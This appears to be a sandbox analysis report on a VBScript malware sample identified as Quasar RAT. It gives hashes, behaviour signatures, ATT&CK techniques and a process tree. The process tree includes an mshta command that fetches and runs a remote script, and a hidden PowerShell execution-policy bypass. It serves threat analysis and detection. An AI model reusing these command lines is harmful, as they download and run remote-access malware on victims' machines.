Overview

overview

10

Static

static

smokeweed.vbs

windows7_x64

10

smokeweed.vbs

windows10_x64

10

Analysis

  • max time kernel
    23s
  • max time network
    150s
  • platform
    windows7_x64
  • resource
    win7v20201028
  • submitted
    26-02-2021 06:14

Sharing

Copy URL
Twitter E-mail
Report Analysis Logs

General

  • Target

    smokeweed.vbs

  • Size

    3KB

  • MD5

    07b8be238ea7e4d28ab60dd6c485f663

  • SHA1

    73c2226a8592f0a729a837013d40e5b55ecb4415

  • SHA256

    78a881cbc86ce0458d8db0eae0c92a8e016537796ef3ab7928037f4a51d4ca2f

  • SHA512

    9d1bcf4a17c4b7986e2fec74f0d4ba020ea2e4933ff9cad19a639d87f0998a32439a227bcd55bf37d08886276a11ede28f06a60af12b6a368b5cdbd2544cf7a0

Score
10/10
quasarspywaretrojan

Malware Config

Signatures

  • Quasar RAT

    Quasar is an open source Remote Access Tool.

    trojanspywarequasar
  • Blocklisted process makes network request 3 IoCs
  • Looks up external IP address via web service 1 IoCs

    Uses a legitimate IP lookup service to find the infected system's external IP.

  • Suspicious use of SetThreadContext 1 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

  • Modifies Internet Explorer settings 1 TTPs 1 IoCs
    adwarespyware
  • Suspicious behavior: EnumeratesProcesses 4 IoCs
  • Suspicious use of AdjustPrivilegeToken 3 IoCs
  • Suspicious use of WriteProcessMemory 21 IoCs

Processes

  • C:\Windows\System32\WScript.exe
    "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\smokeweed.vbs"
    1⤵
    • Suspicious use of WriteProcessMemory
    PID:1924
    • C:\Windows\System32\WScript.exe
      "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\smokeweed.vbs" /elevate
      2⤵
      • Suspicious use of WriteProcessMemory
      PID:1548
      • C:\Windows\System32\mshta.exe
        "C:\Windows\System32\mshta.exe" https://z.zz.ht/bBtXS.txt
        3⤵
        • Blocklisted process makes network request
        • Modifies Internet Explorer settings
        • Suspicious use of WriteProcessMemory
        PID:1740
        • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
          "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noexit
          4⤵
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of AdjustPrivilegeToken
          PID:552
      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass -windowstyle hidden -noexit -command C:\Users\Public\Datax.ps1;
        3⤵
        • Blocklisted process makes network request
        • Suspicious use of SetThreadContext
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        • Suspicious use of WriteProcessMemory
        PID:1204
        • C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exe
          "C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exe"
          4⤵
          • Suspicious use of AdjustPrivilegeToken
          PID:1988

Network

MITRE ATT&CK Matrix ATT&CK v6

Initial Access

Execution

Persistence

Privilege Escalation

Defense Evasion

Modify Registry

1
T1112

Credential Access

Discovery

System Information Discovery

1
T1082

Lateral Movement

Collection

Exfiltration

Command and Control

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

  • C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms
    MD5

    75d05d357b304f6e67b439f910578f1f

    SHA1

    36af4bbe8fbb97ba5f917df46f4ec31e02105ee2

    SHA256

    691800a0ca082c50559d5e09ab0f5d340ad9d310868007beff2fe2c5ccd7d407

    SHA512

    2adb0984d9985ae893840f44fcf4fa588ad8b16383d5d78eb9637bf1c290c7c69fe8feb4cea39d74d9a0cdd391fffedf7c3839e362dc16d64beed4ae0b672940

    Download Submit
  • C:\Users\Public\Datax.ps1
    MD5

    c85a52e535d54935f25bc43e8b393b1a

    SHA1

    963baebff776005de53b5c68608c5c5205400b50

    SHA256

    0545f59b84c4323711d72e396797694068bd7a56695aea0cdd90352a4a0c7753

    SHA512

    729398ee2dbb41b6f38c106dd3a75fbb695f700b009e6f5267f4242588764a5b3b407b7e2fbb17f9fd4cfc8684e04c39c2e68b6b400de750c2c2c4967d49f184

    Download Submit
  • memory/552-15-0x000000001AC04000-0x000000001AC06000-memory.dmp
    Filesize

    8KB

    Download
  • memory/552-16-0x0000000001EC0000-0x0000000001EC1000-memory.dmp
    Filesize

    4KB

    Download
  • memory/552-14-0x000000001AC00000-0x000000001AC02000-memory.dmp
    Filesize

    8KB

    Download
  • memory/552-8-0x0000000000000000-mapping.dmp
    Download
  • memory/552-10-0x000007FEF38E0000-0x000007FEF42CC000-memory.dmp
    Filesize

    9.9MB

    Download
  • memory/552-11-0x0000000002500000-0x0000000002501000-memory.dmp
    Filesize

    4KB

    Download
  • memory/552-12-0x000000001AC80000-0x000000001AC81000-memory.dmp
    Filesize

    4KB

    Download
  • memory/552-13-0x0000000002680000-0x0000000002681000-memory.dmp
    Filesize

    4KB

    Download
  • memory/1204-21-0x000007FEF38E0000-0x000007FEF42CC000-memory.dmp
    Filesize

    9.9MB

    Download
  • memory/1204-48-0x000000001ABEA000-0x000000001AC09000-memory.dmp
    Filesize

    124KB

    Download
  • memory/1204-49-0x000000001A980000-0x000000001A986000-memory.dmp
    Filesize

    24KB

    Download
  • memory/1204-17-0x0000000000000000-mapping.dmp
    Download
  • memory/1204-47-0x000000001B710000-0x000000001B711000-memory.dmp
    Filesize

    4KB

    Download
  • memory/1204-46-0x000000001A970000-0x000000001A971000-memory.dmp
    Filesize

    4KB

    Download
  • memory/1204-45-0x000000001A960000-0x000000001A961000-memory.dmp
    Filesize

    4KB

    Download
  • memory/1204-25-0x000000001ABE0000-0x000000001ABE2000-memory.dmp
    Filesize

    8KB

    Download
  • memory/1204-26-0x000000001ABE4000-0x000000001ABE6000-memory.dmp
    Filesize

    8KB

    Download
  • memory/1204-33-0x0000000002880000-0x0000000002881000-memory.dmp
    Filesize

    4KB

    Download
  • memory/1204-29-0x000000001C630000-0x000000001C631000-memory.dmp
    Filesize

    4KB

    Download
  • memory/1204-30-0x00000000025A0000-0x00000000025A1000-memory.dmp
    Filesize

    4KB

    Download
  • memory/1548-3-0x0000000000000000-mapping.dmp
    Download
  • memory/1548-18-0x0000000002510000-0x0000000002514000-memory.dmp
    Filesize

    16KB

    Download
  • memory/1688-7-0x000007FEF6680000-0x000007FEF68FA000-memory.dmp
    Filesize

    2.5MB

    Download
  • memory/1740-6-0x0000000000000000-mapping.dmp
    Download
  • memory/1924-2-0x000007FEFC021000-0x000007FEFC023000-memory.dmp
    Filesize

    8KB

    Download
  • memory/1924-4-0x0000000002500000-0x0000000002504000-memory.dmp
    Filesize

    16KB

    Download
  • memory/1988-50-0x0000000000400000-0x000000000045E000-memory.dmp
    Filesize

    376KB

    Download
  • memory/1988-51-0x000000000045819E-mapping.dmp
    Download
  • memory/1988-52-0x00000000740E0000-0x00000000747CE000-memory.dmp
    Filesize

    6.9MB

    Download
  • memory/1988-53-0x0000000000400000-0x000000000045E000-memory.dmp
    Filesize

    376KB

    Download
  • memory/1988-55-0x0000000004C30000-0x0000000004C31000-memory.dmp
    Filesize

    4KB

    Download